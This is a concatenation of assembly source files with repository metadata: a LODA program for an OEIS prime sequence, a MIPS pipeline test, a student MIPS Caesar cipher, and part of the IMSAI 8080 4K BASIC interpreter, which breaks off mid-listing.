ra,0x0 c5a: b74080e7 jalr -1164(ra) # 7ca <sbrk> if(p == (char*)-1) c5e: fd5518e3 bne a0,s5,c2e <malloc+0xae> return 0; c62: 4501 li a0,0 c64: bf45 j c14 <malloc+0x94>

30.913279

75

0.473657

f150794ac234d452cd6f1105142dfb8085f51b77

811

asm

Assembly

oeis/142/A142060.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

11

2021-08-22T19:44:55.000Z

2022-03-20T16:47:57.000Z

oeis/142/A142060.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

9

2021-08-29T13:15:54.000Z

2022-03-09T19:52:31.000Z

oeis/142/A142060.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

3

2021-08-22T20:56:47.000Z

2021-09-29T06:26:12.000Z

; A142060: Primes congruent to 19 mod 33. ; Submitted by Jon Maiga ; 19,151,283,349,547,613,811,877,1009,1471,1669,1801,1867,1933,1999,2131,2593,2659,2791,2857,3121,3187,3253,3319,3517,3583,3847,4111,4177,4243,4441,4507,4639,4903,4969,5101,5167,5233,5431,5563,5827,6091,6421,6553,6619,6883,6949,7213,7411,7477,7741,7873,8269,8467,8599,8731,8863,8929,9127,9391,9721,9787,10513,10711,10909,11173,11239,11437,11503,11701,11833,12097,12163,12757,12823,12889,13219,13417,13681,13879,14011,14143,14341,14407,14737,14869,15199,15331,15661,15727,15859,15991,16057,16189,16453 mov $2,$0 add $2,6 pow $2,2 lpb $2 add $4,18 mov $3,$4 seq $3,10051 ; Characteristic function of primes: 1 if n is prime, else 0. sub $0,$3 mov $1,$0 max $1,0 cmp $1,$0 mul $2,$1 sub $2,1 add $4,48 lpe mov $0,$4 add $0,19

36.863636

500

0.726264

d73653567b954334338cccf306b147d33797d69d

872

asm

Assembly

Lab5/lab5_test2/test.asm

LuciferDarkStar/USTC_2020_COD

1812e4734ee949f1674640977f9d6dbc6c5ebd50

[ "MIT" ]

null

Lab5/lab5_test2/test.asm

LuciferDarkStar/USTC_2020_COD

1812e4734ee949f1674640977f9d6dbc6c5ebd50

[ "MIT" ]

null

Lab5/lab5_test2/test.asm

LuciferDarkStar/USTC_2020_COD

1812e4734ee949f1674640977f9d6dbc6c5ebd50

[ "MIT" ]

null

# Test cases for MIPS 5-Stage pipeline .data .word 0,1,2,3,0x80000000,0x80000100,0x100,5,0 _start: add $t1, $0, $0 # $t1 = 0 j _test0 _test0: addi $t2, $0, 1 # $t2 = 1 addi $t2, $t2, 1 # $t2 = 2 add $t2, $t2, $t2 # $t2 = 4 addi $t2, $t2, -4 # $t2 = 0 beq $t2, $0, _next0 # if $t2 == $0: $t1++, go next testcase, else: go fail j _fail _next0: addi $t1, $t1, 1 # $t1++ j _test1 _test1: addi $0, $0, 4 # $0 += 4 lw $t2, 4($0) # $t2 = MEM[1] lw $t3, 8($0) # $t3 = MEM[2] add $t4, $t2, $t3 sw $t4, 0($0) # MEM[0] = $t4 lw $t5, 0($0) # $t5 = MEM[0] lw $t6, 12($0) # $t6 = MEM[3] beq $t5, $t6, _next1 j _fail _next1: addi $t1, $t1, 1 j _success _fail: j _fail _success: j _success # if success: $t1 == 2

21.8

80

0.442661

ff38cee1fdb33fdc389c9effda062ee8cf07e16e

4,813

asm

Assembly

CaesarCipher.asm

Kiro47/CaesarCipher

21c01f85d88714b6be1a2b87ad0f192f6228d6db

[ "Unlicense" ]

1

2021-04-16T01:05:26.000Z

CaesarCipher.asm

Kiro47/CaesarCipher

21c01f85d88714b6be1a2b87ad0f192f6228d6db

[ "Unlicense" ]

null

CaesarCipher.asm

Kiro47/CaesarCipher

21c01f85d88714b6be1a2b87ad0f192f6228d6db

[ "Unlicense" ]

null

#Name: __STRIPPED__ #Username: __STRIPPED__ #Description: This program performs a Caesar Cipher of specified shifting on capital letters of words. #email: __STRIPPED__ #DateCreated: 10-04-16 #DateLastRevised: 10-08-16 ########################################## #Begin ########################################## ##### Variable Directory ### $t8 and $t9 are only used in pre-proccessing # $t9 = byte counter ### Used throughought the main part of the program # $t7 = amount to shift by # $t6 = Pointer to the address to perform on next # $t5 = The next word to be changed # $t4 = Lowest value of capital ASCII chars # $t3 = Highest value of capital ASCII chars # $t0 = byte to handle main: b reset ###################################### # Iterate over the characters in a word # and check if they're capital # if they are, shift; then store in memory ###################################### iterateOver: lb $a0, 0($t6) # Load character of the word beq $a0, 0, nextWord # Ending of structure jal checkHigh # Jump to check character and link li $v0, 11 #Call command to output char syscall # Outputs char in #a0 add $t6, $t6, 1 # increment to next byte b iterateOver # loop de loop ##################################### # Ends the current word ##################################### finishWord: lb $a0, 0($t6) # Load the next letter beq $a0, 0, exit # Exit the system jal checkHigh #Iterates over the final word li $v0, 11 # Prep out command for $a0 syscall #output character add $t6, $t6, 1 # Move on to the next b finishWord # loop de loop ##################################### # Check to see if character is in range ##################################### checkHigh: ble $a0, 90, checkLow # Char falls into bounds, crypt shift it jr $ra # Return to jal in iterateOver ##################################### # Check to see if character is in range ##################################### checkLow: bge $a0, 65, crypt # Char falls into bounds, crypt shift it jr $ra # Return to jal in iterateOver ##################################### # Lowers character until within range ##################################### crypt: add $a0, $a0, $t9 # Add in shift bgt $a0, 90, lowerCharacter # If too high out of range, wrap blt $a0, 65, raiseCharacter # If too low out of range, wrap jr $ra # Jump back to iterateOver jal ##################################### # Lowers character until within range ##################################### lowerCharacter: sub $a0, $a0, 26 # Subtract 26 to put back in range, EX: Z + shift of right 1 = dec(91). 91 - 26 = 65 (ASCII 'A') #bgt $t0, $t3 , lowerCharacter #Used to wrap characters around to 'A' if they exceed the level jr $ra # Jump back to iterateOver jal ##################################### # Raises character until within range ##################################### raiseCharacter: add $a0, $a0, 26 # Add 26 to put back in range, EX: A + shift of left 1 = dec(64). 64 + 26 = 90 (ASCII 'Z') #blt $t0, $t4 , raiseCharacter #Used to wrap characters around to 'Z' if they are below the level jr $ra # Jump back to iterateOver jal ##################################### # Jump to next word ##################################### nextWord: lw $t5, 0($t7) # to next beq $t5, -1 finishWord # Permits start of end sequence lw $t8, 0($t7) # Load node word la $t7, 0($t8) # load next address la $t6, 4($t8) # load next node word address lw $t5, 0($t8) # to next li $v0, 11 #Syscall, 11 to print out addi $a0, $0, 32 # ASCII Space syscall # Push out space character beq $t5, -1 finishWord # Permits start of end sequence j iterateOver # Go to iterateOver and start scanning ###################################### # Exits the program ###################################### exit: li $v0, 10 # Loads exit code to be called syscall # Issue system call to terminate program ###################################### # Reset all active used value to zero ###################################### reset: ########### li $a0, 0 # Set all arguments as 0 li $a1, 0 li $a2, 0 li $a3, 0 ########### Set All temp var values as 0 li $t0, 0 li $t1, 0 li $t2, 0 li $t3, 0 li $t4, 0 li $t5, 0 li $t6, 0 li $t7, 0 li $t8, 0 li $t9, 0 ########### Set All saved var values as 0 li $s0, 0 li $s1, 0 li $s2, 0 li $s3, 0 li $s4, 0 li $s5, 0 li $s6, 0 li $s7, 0 # Start the main portion of the program b preset ###################################### # Set up Enviroment ###################################### preset: lw $t9, shift # Amount to peform binary shifts to and from la $t8, first # Address pointer Node la $t7, 0($t8) # Load word la $t6, 4($t8) # Load message beq $t7, -1, finishWord b iterateOver #Finds the point to start saving encrypted chars ### START DATA ### .data shift: .word 3 first: .word -1 ### END DATA ###

28.64881

114

0.548307

466e54763d0cc9bc445337b7d1f1a1a840d6bfbf

105,927

asm

Assembly

imsaisim/basic4k.asm

qoelet/z80pack

c8845396636e7316d449b4107c5c7ab98fffbc1a

[ "MIT" ]

85

2018-02-26T02:45:55.000Z

2022-03-27T00:04:54.000Z

imsaisim/basic4k.asm

lawrencewoodman/z80pack

d57e3b50cd796e3f562c569a8270b4586999b12a

[ "MIT" ]

76

2018-03-02T12:38:11.000Z

2022-01-28T11:46:02.000Z

imsaisim/basic4k.asm

lawrencewoodman/z80pack

d57e3b50cd796e3f562c569a8270b4586999b12a

[ "MIT" ]

25

2018-02-24T15:50:23.000Z

2022-03-07T11:23:10.000Z

*HEADING IMSAI 8080 4K BASIC ; ; MODIFIED TO WORK WITH SIO-2 TTY IDENTICAL TO 8K VERSION ; OCTOBER 2008, UDO MUNK ; ORG 0 ; ; BASIC EQU $ LD HL,RAM+1024 ;POINT FIRST POSSIBLE END OF RAM ; LD A,0FAH ;GET MODE SET LD A,0BAH ;**UM** JP CONTI ;GO CONTINUE ; ; ORG 8 RST1 EQU $ ; ;SKIP CHARS POINTED TO BY HL UNTIL NON-BLANK, ;LEAVE IN REG A ; LD A,(HL) ;LOAD THE BYTE AT (HL) CP ' ' ;TEST IF BLANK RET NZ ;RETURN IF NOT INC HL ;POINT NEXT JP RST1 ;LOOP ; ; ORG 16 RST2 EQU $ ; ;COMPARE STRING AT (HL) TO STRING AT (DE) ;RETURN IF EQUAL (THRU X'00' IN DE) OR ON FIRST NOT EQUAL ;IGNORE ALL SPACES ; RST 8 ;SKIP SPACES LD A,(DE) ;GET CHAR TO MATCH WITH OR A ;TEST IT JP NZ,COMP2 ;BRIF NOT EQUAL LD A,(HL) ;GET CHAR FOLLOWING RET ;RETURN ; ; ORG 24 RST3 EQU $ ; ;PRINT: 'XX ERR @ NNNN' ; LD HL,IOBUF ;POINT BUFFER LD (HL),B ;MOVE HI CHAR INC HL ;POINT NEXT JP ERROR ;CONTINUE ELSEWHERE ; ; ORG 32 RST4 EQU $ ; ;SHIFT THE LOW ORDER 4 BITS OF REG A TO THE HIGH 4 BITS ; AND 0FH ;ISOLATE LOW 4 RLA ;SHIFT ONE BIT RLA ;AGAIN RLA ;AGAIN RLA ;ONE LAST TIME RET ;RETURN ; ; ORG 40 RST5 EQU $ ; ;LOAD THE FLOATING POINT ACCUMULATOR WITH THE 4 BYTES AT (HL) ; LD DE,FACC ;POINT FLOAT ACC LD B,4 ;BYTE COUNT JP COPYH ;GO MOVE IT ; ; ORG 48 RST6 EQU $ ; ;STORE THE FLOATING POINT ACCUMULATOR AT (HL) ; LD DE,FACC ;POINT FLOAT ACC LD B,4 ;BYTE COUNT JP COPYD ;GO MOVE IT ; ; ORG 56 RST7 EQU $ ; ;INCREMENT HL BY BYTE AT (SP), RETURN TO (SP)+1 ; EX (SP),HL ;GET RETURN ADDR IN HL LD A,(HL) ;GET THE INCREMENT INC HL ;POINT TRUE RETURN EX (SP),HL ;PUT BACK TO STACK PUSH DE ;SAVE DE LD E,A ;PUT IT IN LOW OR A ;TEST SIGN LD D,0 ;DEFAULT POSITIVE JP P,RST7A ;BRIF + LD D,0FFH ;ELSE, NEG RST7A ADD HL,DE ;BUMP HL POP DE ;RESTORE DE RET ;RETURN ; ; ; CONTI EQU $ ; ;INITIALIZATION ROUTINE ;DETERMINE MEMORY SIZE. (START AT 4K AND TRY 1K INCREMENTS) ;SETUP POINTERS FOR STACK, DATA, AND PROGRAM ;INIT SIO BOARD ; ; OUT (TTY-1),A ;WRITE TO SIO OUT (TTY+1),A ;**UM** ; LD A,17H ;CMND: DTR, ENABLE TRNS, & RCVR, LD A,37H ;**UM** ; OUT (TTY-1),A ;WRITE TO SIO OUT (TTY+1),A ;**UM** LD BC,1024 ;1K INCR FINDL EQU $ LD A,(HL) ;GET A BYTE FROM MEMORY CPL ;COMPLEMENT LD (HL),A ;REPLACE CP (HL) ;TEST IF RAM/ROM/END JP NZ,MEMEN ;BRIF OUT OF RAM CPL ;RE-COMPLEMENT LD (HL),A ;PUT ORIG BACK ADD HL,BC ;POINT NEXT 1K BLOCK JP NC,FINDL ;LOOP TILL 64K MEMEN LD SP,HL ;SET STACK POINTER TO END OF MEMORY RST RST7 ;GO BUMP HL ADDR DEFB -100 ;ALLOW 100 BYTES LD (DATAB),HL ;SAVE ADDR OF START OF DATA XOR A ;GET A ZERO IN A LD (HL),A ;MARK EMPTY DATA LD (OUTSW),A ;TURN OUTPUT SUPPRESS OFF PUSH AF ;SET STACK 1 LEVEL DEEP WITHOUT LD HL,0 ;CLEAR HL ADD HL,SP ;SP TO HL LD (STACK),HL ;SAVE BEG OF STACK LD HL,BEGPR-1 ;POINT ONE BEFORE START OF PROGRAM LD (HL),A ;MARK EMPTY LD HL,RNDX ;POINT INIT RND NUMBER RST RST5 ;GO LOAD TO FACC LD HL,RNDNU ;POINT RAM AREA RST RST6 ;GO STORE LD HL,RAM ;POINT 1 BEFORE IOBUFF LD (HL),0FFH ;SET HIGH VALUE GENRN CALL RND ;GO GENERATE A RANDUM NUMBER ; IN A,(TTY-1) ;GET TTY STATUS ; AND 40H ;ISOLATE RXRDY IN A,(TTY+1) ;**UM** AND 2 ;**UM** JP Z,GENRN *HEADING IMSAI 8080 4K BASIC READY EQU $ ; ; ;COMMAND INPUT ROUTINE ; ;READ A LINE FROM THE TTY ;IF STARTS WITH NUMERIC CHARACTERS, ASSUME IT'S A BASIC STA ;IF NOT, THEN IT IS EITHER AN IMMEDIATE STATEMENT OR A COM ; GETCM XOR A ;SET NO PROMPT LD HL,(STACK) ;GET STACK ADDRESS LD SP,HL ;SET REG SP CALL TERMI ;GET A LINE CALL PACK ;GO PACK THE NUMBER INTO BC LD A,B ;GET HI BYTE OF LINE NUMBER OR C ;PLUS LOW BYTE JP Z,EXEC ;BRIF EXEC STATEMENT PUSH BC ;SAVE LINE NUMBER LD DE,IMMED+1 ;POINT SAVE AREA EX DE,HL ;FLIP/FLOP LD (HL),B ;PUT LO LINE INC HL ;POINT NEXT LD (HL),C ;PUT LO LINE INC HL ;POINT NEXT LD B,3 ;INIT COUNT EDIT1 LD A,(DE) ;GET A BYTE LD (HL),A ;PUT IT DOWN INC B ;COUNT IT INC HL ;POINT NEXT INC DE ;DITTO OR A ;TEST BYTE JUST MOVED JP NZ,EDIT1 ;LOOP LD A,B ;GET COUNT LD (IMMED),A ;STORE THE COUNT POP BC ;GET LINE NUMBER LD HL,BEGPR ;POINT BEGINNING OF PROGRAM EDIT2 LD A,(HL) ;GET LEN CODE PUSH HL ;SAVE ADDR OR A ;TEST IT JP Z,EDIT5 ;BRIF END INC HL ;POINT HI LINE LD A,(HL) ;LOAD IT CP B ;COMPARE JP C,EDIT4 ;BRIF LOW JP NZ,EDIT5 ;EDIT5 BRIF HIGH INC HL ;POINT LO LINE LD A,(HL) ;LOAD IT CP C ;COMPARE JP C,EDIT4 ;BRIF LOW JP NZ,EDIT5 ;BRIF HIGH DEC HL ;POINT BACK DEC HL ;TO BEGIN LD D,H ;COPY ADDR LD E,L ;TO DE LD B,0 ;GET A ZERO LD C,(HL) ;GET LEN ADD HL,BC ;POINT NEXT STMT EDIT3 LD A,(HL) ;GET LEN NEXT STMT OR A ;TEST IT JP Z,EDITX ;BRIF END LD B,A ;SET LENGTH CALL COPYH ;ELSE MOVE LINE JP EDIT3 ;LOOP EDIT4 POP HL ;GET ADDR LD D,0 ;ZERO HI LEN LD E,(HL) ;GET LO LEN ADD HL,DE ;COMPUTE ADDR NEXT LINE JP EDIT2 ;LOOP EDITX EX DE,HL ;PUT NEW ADDR TO HL LD (HL),A ;MARK END LD (PROGE),HL ;AND UPDATE ADDRESS EDIT5 LD A,(IMMED) ;GET LEN OF INSERT CP 4 ;TEST IF DELETE JP Z,GETCM ;BRIF IS LD C,A ;SET LO LEN LD B,0 ;ZERO HI LEN LD HL,(PROGE) ;GET END OF PROG LD D,H ;COPY TO LD E,L ;DE ADD HL,BC ;DISP LEN OF INSERT LD (PROGE),HL ;UPDATE END POINT POP BC ;GET ADDR EDIT6 LD A,(DE) ;GET A BYTE LD (HL),A ;COPY IT DEC DE ;POINT PRIOR DEC HL ;DITTO LD A,D ;GET HI ADDR CP B ;COMPARE JP Z,EDIT7 ;BRIF HI EQUAL JP NC,EDIT6 ;BRIF NOT LESS EDIT7 LD A,E ;GET LO ADDR CP C ;COMPARE JP NC,EDIT6 ;BRIF NOT LESS INC DE ;POINT FORWARD LD HL,IMMED ;POINT INSERT LD B,(HL) ;GET LENGTH CALL COPYH ;GO MOVE IT JP GETCM ;GO COMMAND *HEADING IMSAI 8080 4K BASIC EXEC EQU $ ; ; ; ;DECODE COMMAND IN IOBUFF ;EXECUTE IF POSSIBLE ;THEN GOTO GET NEXT COMMAND ; ; LD DE,NEWLI ;POINT "NEW" LD HL,IOBUF ;POINT BUFFER RST RST2 ;GO COMPARE JP NZ,NOTSC ;BRIF NOT LD HL,BEGPR ;POINT BEGINNING OF PGM LD (PROGE),HL ;SAVE END ADDRESS XOR A ;GET A ZERO LD (HL),A ;MARK EMPTY LD HL,(DATAB) ;POINT BEGINNING OF DATA LD (HL),A ;MARK EMPTY JP READY ;GO GET NEXT COMMAND NOTSC LD DE,LISTL ;POINT LITERAL LD HL,IOBUF ;POINT BUFFER RST RST2 ;GO COMPARE JP Z,LIST ;BRIF 'LIST' LD DE,RUNLI ;POINT LITERAL LD HL,IOBUF ;POINT BUFFER RST RST2 ;GO COMPARE JP Z,RUNIT ;BRIF 'RUN' LD (RUNSW),A ;SET IMMEDIATE MODE LD HL,IOBUF ;POINT STMT LD DE,IMMED ;POINT NEW AREA IMED LD A,(HL) ;GET A BYTE LD (DE),A ;PUT TO D INC DE ;POINT NEXT INC HL ;DITTO OR A ;TEST IF END JP NZ,IMED ;LOOP LD HL,NULLI ;POINT FFFF LD (LINE),HL ;SAVE ADDR LD HL,IMMED ;POINT START OF CMMD JP IMMD ;GO IMMEDIATE *HEADING IMSAI 8080 4K BASIC RUNIT EQU $ ; ; ;RUN PROCESSOR, GET NEXT STATEMENT, AND EXECUTE IT ;IF IN IMMEDIATE MODE, THEN RETURN TO GETCMMD ; ; XOR A ;CLEAR A REG LD (RUNSW),A ;RESET SWITCH LD (FORNE),A ;INIT FOR/NEXT TABLE LD HL,(DATAB) ;POINT START OF VARIABLES LD (HL),0 ;CLEAR IT LD HL,BEGPR-1 ;GET ADDR OF PROGRAM LD (DATAP),HL ;'RESTORE' INC HL ;POINT 1ST BYTE LD (STMT),HL ;SAVE IT JP NEXTS ;GO PROCESS IT ; RUN LD HL,(STMT) ;GET ADDR OF PREVIOUS STMT LD E,(HL) ;GET LEN CODE LD D,0 ;CLEAR HIGH BYTE OF ADDR ADD HL,DE ;INCR STMT POINTER LD (STMT),HL ;SAVE IT ; NEXTS EQU $ LD A,(RUNSW) ;GET RUN TYPE OR A ;TEST IT JP NZ,GETCM ;BRIF IMMEDIATE MODE LD A,(HL) ;GET LEN CODE OR A ;SEE IF NO MORE STATEMENTS JP Z,READY ;BRIF END NOTDO EQU $ INC HL ;POINT LINE NUMBER LD (LINE),HL ;SAVE ADDR INC HL ;POINT 2ND BYTE INC HL ;POINT 1ST PGM BYTE IMMD RST RST1 ;SKIP BLANKS CONTX LD (ADDR1),HL ;SAVE ADDR CALL TSTCH ;GO SEE IF CONTROL-C LD DE,JMPTB ;POINT TO TABLE TABLO LD A,(DE) ;GET FIRST BYTE OF LIT OR A ;TEST IF END OF TABLE JP Z,TABEN ;BRIF IS LD HL,(ADDR1) ;GET ADDRESS OF CMMD RST RST2 ;GO COMPARE JP NZ,NOJMP ;BRIF NOT EQUAL PUSH HL ;SAVE HL INC DE ;POINT NEXT BYTE LD A,(DE) ;LOAD IT LD L,A ;LOW BYTE TOL INC DE ;POINT NEXT BYTE LD A,(DE) ;LOAD IT LD H,A ;HIGH BYTE TO H EX (SP),HL ;HL TO STACK, STACK TO HL RET ;JUMP TO PROPER ROUTINE NOJMP INC DE ;POINT NEXT LD A,(DE) ;LOAD IT OR A ;TEST IT JP NZ,NOJMP ;BRIF NOT INC DE ;POINT NEXT INC DE ;DITTO INC DE ;POINT FIRST BYTE NEXT LIT JP TABLO ;LOOP ; TABEN LD HL,(ADDR1) ;RESTORE HL POINTER JP LET ;ASSUME IT'S A LET STATEMENT *HEADING IMSAI 8080 4K BASIC LIST EQU $ ; ; ;LIST PROCESSOR ;DUMP THE SOURCE PROGRAM TO TTY OR PAPER TAPE ; ; LD HL,BEGPR ;POINT BEGINNING OF PROGRAM LISTX LD A,(HL) ;GET LEN CODE OR A ;TEST IF END OF PGM JP Z,READY ;BRIF END OF PGM SUB 3 ;SUBTRACT THREE LD B,A ;SAVE LEN INC HL ;POINT HI BYTE OF LINE # LD DE,IOBUF ;POINT BUFFER AREA CALL LINEO ;CONVERT LINE NUMBER CALL COPYH ;GO MOVE THE LINE CALL TSTCH ;GO SEE IF CONTROL-C PUSH HL ;SAVE HL ADDR CALL TERMO ;GO TYPE IT POP HL ;RETREIVE H ADDR JP LISTX ;CONTINUE ; *HEADING IMSAI 8080 4K BASIC GOSUB EQU $ ; ; ; STMT: GOSUB NNNN ; EX DE,HL ;FLIP/FLOP DE HL LD HL,(STMT) ;GET STATEMENT ADDRESS PUSH HL ;SAVE RETURN ADDRESS IN STACK LD A,0FFH ;MARK AS GOSUB PUSH AF ;SAVE STATUS EX DE,HL ;RESTORE HL ; ; GOTO EQU $ ; ; ; STMT: GOTO NNNN ; CALL PACK ;GO GET LINE NUMBER IN BC LD HL,BEGPR ;POINT BEGINNING OF PROGRAM GOTO1 LD A,(HL) ;GET LEN OR A ;TEST IF END OF PROGRAM JP Z,ULERR ;BRIF UNDEFIND STATEMENT INC HL ;POINT NEXT LD A,(HL) ;GET THE HIGH LINE NUMBER CP B ;TEST WITH DESIRED JP C,GOTO2 ;BRIF LOW INC HL ;POINT NEXT BYTE LD A,(HL) ;GET LOW LINE NUMBER DEC HL ;POINT BACK CP C ;TEST WITH WANTED JP C,GOTO2 ;BRIF LOW JP NZ,ULERR ;BRIF LINE MISSING DEC HL ;POINT TO START OF STMT LD (STMT),HL ;SAVE ADDR JP NEXTS ;GO PROCESS THE STATEMENT GOTO2 DEC HL ;POINT START OF STMT LD E,(HL) ;GET LENGTH LD D,0 ;ZERO MDB ADD HL,DE ;POINT NEXT STMT JP GOTO1 ;LOOP *HEADING IMSAI 8080 4K BASIC RETUR EQU $ ; ; ; STMT: RETURN ; POP AF ;POP THE STACK CP 0FFH ;TEST IF GOSUB IN EFFECT JP NZ,RTERR ;BRIF ERROR POP HL ;GET RETURNED STATEMENT ADDRESS LD (STMT),HL ;RESTORE JP RUN ;CONTINUE AT STMT FOLLOWING GOSUB *HEADING IMSAI 8080 4K BASIC PRINT EQU $ ; ; ; STMT: PRINT . . . . ; ; XOR A ;CLEAR REG A LD (PRSW),A ;SET SWITCH PR1 LD DE,IOBUF ;POINT BUFFER RST RST1 ;SKIP TO NEXT FIELD CP '"' ;TEST IF QUOTE JP NZ,PR6 ;BRIF NOT LITERAL PR2 INC HL ;POINT NEXT LD A,(HL) ;GET THE CHAR OR A ;TEST IF END OF STMT JP Z,SNERR ;BRIF MISSING END OF QUOTE PR3 CP '"' ;TEST IF END QUOTE JP NZ,PR5 ;BRIF NOT INC HL ;POINT NEXT PRNXT LD A,0FEH ;SET CODE = NO CR/LF LD (DE),A ;PUT TO BUFFER PUSH HL ;SAVE HL CALL TERMO ;GO PRINT IT POP HL ;RESTORE HL JP PRINT ;RECURSIVE TO NEXT FIELD PR4 LD A,(PRSW) ;GET SWITCH OR A ;TEST IF STMT ENDED WITH , OR ; CALL Z,CRLF ;CALL IF NOT JP RUN ;CONTINUE NEXT STMT PR5 LD (DE),A ;PUT CHAR TO BUFFER INC DE ;POINT NEXT OUT JP PR2 ;LOOP PR6 OR A ;TEST IF END OF STMT JP Z,PR4 ;BRIF IT IS CP ',' ;TEST IF COMMA JP Z,PR7 ;BRIF IT IS CP ';' ;TEST IF SEMI-COLON JP Z,PR8 ;BRIF IT IS PUSH DE ;SAVE DE CALL EXPR ;GO EVALUATE EXPRESSION POP DE ;RESTORE DE PUSH HL ;SAVE HL EX DE,HL ;FLIP/FLOP CALL FOUT ;GO CONVERT OUTPUT INC HL ;POINT NEXT LD (HL),' ' ;SPACE FOLLOWS NUMBERS INC HL ;POINT NEXT EX DE,HL ;FLIP/FLOP POP HL ;RESTORE HL JP PRNXT ;CONTINUE PR7 LD A,(COLUM) ;GET COLUMN POINTER CP 56 ;COMPARE TO 56 JP NC,TBEND ;BRIF NO ROOM LEFT LD B,A ;SAVE IT XOR A ;INIT POSITION TBLP CP B ;COMPARE JP Z,TBLP2 ;BRIF ON A TAB STOP JP NC,TBON ;BRIF SHY OF TAB TBLP2 ADD A,14 ;POINT NEXT STOP JP TBLP ;LOOP TBON LD (COLUM),A ;UPDATE CTR SUB B ;COMPUTE NUMBER OF SPACES LD B,A ;SAVE IT TBSPA CALL TESTO ;WAIT TILL READY LD A,' ' ;SPACE TO REG A OUT (TTY),A ;OUTPUT IT DEC B ;SUB 1 FROM CTR JP NZ,TBSPA ;LOOP IF NOT PR8 INC HL ;POINT NEXT LD (PRSW),A ;SET THE SWITCH JP PR1 ;GO NEXT FIELD TBEND CALL CRLF ;PUT CR/LF JP PR8 ;GO SET SW *HEADING IMSAI 8080 4K BASIC FOR EQU $ ; ; ; STMT: FOR VAR = EXPR TO EXPR :STEP EXPR: ; ; CALL VAR ;NEXT WORD MUST BE VARIABLE EX DE,HL ;FLIP/FLOP LD (INDX),HL ;SAVE VARIABLE NAME EX DE,HL ;FLIP/FLOP AGAIN CP '=' ;TEST FOR EQUAL SIGN JP NZ,SNERR ;BRIF NO EQUAL INC HL ;POINT NEXT CALL EXPR ;GO EVALUATE EXPR IF ANY PUSH HL ;SAVE HL LD HL,(INDX) ;GET INDEX NAME EX DE,HL ;FLIP/FLOP CALL SEARC ;GO LOCATE NAME EX DE,HL ;PUT ADDR IN HL LD (ADDR1),HL ;SAVE ADDR RST RST6 ;GO STORE THE VALUE POP HL ;RESTORE POINTER TO STMT LD DE,TOLIT ;GET LIT ADDR RST RST2 ;GO COMPARE JP NZ,SNERR ;BRIF ERROR CALL EXPR ;GO EVALUATE TO-EXPR PUSH HL ;SAVE HL LD HL,TVAR1 ;POINT SAVE AREA RST RST6 ;SAVE 'TO' EXPR LD HL,ONE ;POINT CONSTANT: 1 RST RST5 ;LOAD IT POP HL ;RESTORE HL LD A,(HL) ;GET THAT CHAR OR A ;TEST FOR END OF STATEMENT JP Z,NOSTP ;BRIF NO STEP LD DE,STEPL ;TEST FOR LIT STEP RST RST2 ;GO COMPARE JP NZ,SNERR ;BRIF NOT STEP FORST CALL EXPR ;GO EVAL STEP NOSTP LD HL,TVAR2 ;GET ADDR OF TEMP VARIABLE RST RST6 ;SAVE END VALUE CALL FTEST ;GET SIGN OF FACC PUSH AF ;SAVE A, STATUS LD HL,TVAR1 ;GET END VALUE RST RST5 ;LOAD IT LD HL,(ADDR1) ;GET ADDR OF INDEX CALL FSUB ;COMPAE TO END VALUE POP AF ;RESTORE STATUS JP P,FORPO ;BRIF FOR IS POS FORXE CALL FTEST ;GET SIGN OF DIFFERENCE JP Z,FORTA ;BRIF START = END JP M,FORTA ;BRIF START > END JP LNEXT ;GO LOCATE MATCHING NEXT FORPO CALL FTEST ;GET SIGN OF DIFFERENCE JP M,LNEXT ;BRIF START > END FORTA LD DE,FORNE ;POINT TABLE LD HL,(INDX) ;GET INDEX NAME EX DE,HL ;FLIP/FLOP LD A,(HL) ;GET COUNT LD B,A ;STORE IT LD C,1 ;NEW CTR OR A ;TEST IF ZERO INC HL ;POINT JP Z,FOREQ ;BRIF TABLE EMPTY FORLP LD A,(HL) ;GET 1ST BYTE CP D ;TEST IF EQUAL JP NZ,FORNO ;BRIF NOT INC HL ;POINT NEXT LD A,(HL) ;GET NEXT BYTE DEC HL ;POINT BACK CP E ;TEST IF EQUAL JP NZ,FOREQ ;BRIF EQUAL FORNO RST RST7 ;GO BUMP HL DEFB 12 ;BY 12 INC C ;COUNT IT DEC B ;DECR CTR JP NZ,FORLP ;LOOP FOREQ LD A,C ;GET UPDATED COUNT CP 9 ;TEST IF TBL EXCEEDED JP NC,FOERR ;ERROR IF MORE THAN 8 OPEN FOR/NEXT LD (FORNE),A ;PUT IN TABLE LD (HL),D ;STORE IT INC HL ;POINT NEXT LD (HL),E ;STORE IT TOO INC HL ;POINT NEXT PUSH HL ;SAVE HL LD HL,TVAR2 ;POINT STEP RST RST5 ;GO LOAD IT POP HL ;RESTORE HL RST RST6 ;PUT IN TABLE PUSH HL ;SAVE HL LD HL,TVAR1 ;POINT TO-VAL RST RST5 ;GO LOAD IT POP HL ;RESTORE HL RST RST6 ;PUT IN TABLE LD A,(STMT+1) ;GET HIGH STMT ADDR LD (HL),A ;PUT IT INC HL ;POINT NEXT LD A,(STMT) ;GET LOW STMT ADDR LD (HL),A ;PUT IT JP RUN ;CONTINUE LNEXT LD HL,(STMT) ;GET ADDR OF STMT LD E,(HL) ;GET LENGTH CODE LD D,0 ;INIT INCREMENT ADD HL,DE ;COMPUTE ADDR OF NEXT STATEMENT LD A,(HL) ;GET NEW LEN CODE OR A ;SEE IF END OF PGM JP Z,NXERR ;BRIF IT IS LD (STMT),HL ;SAVE ADDRESS RST RST7 ;GO BUMP HL DEFB 3 ;BY THREE RST RST1 ;SKIP SPACES LD DE,NEXTL ;POINT 'NEXT' RST RST2 ;SEE IF IT IS A NEXT STMT JP NZ,LNEXT ;LOOP IF NOT RST RST1 ;SKIP SPACES LD A,(INDX+1) ;GET FIRST CHAR CP (HL) ;COMPARE JP NZ,LNEXT ;BRIF NOT MATCH NEXT LD A,(INDX) ;GET 2ND CHAR INC HL ;DITTO CP ' ' ;SEE IF SINGLE CHAR JP Z,FORN1 ;BRIF IT IS CP (HL) ;COMPARE THE TWO JP NZ,LNEXT ;BRIF NOT EQUAL FORN1 RST RST1 ;SKIP TO END (HOPEFULLY) OR A ;SEE IF END JP NZ,LNEXT ;BRIF NOT END JP RUN ;ELSE, GO NEXT STMT *HEADING IMSAI 8080 4K BASIC IF EQU $ ; ; ; STMT: IF EXPR RELATION EXPR THEN STMT # ; ; CALL EXPR ;GO EVALUATE 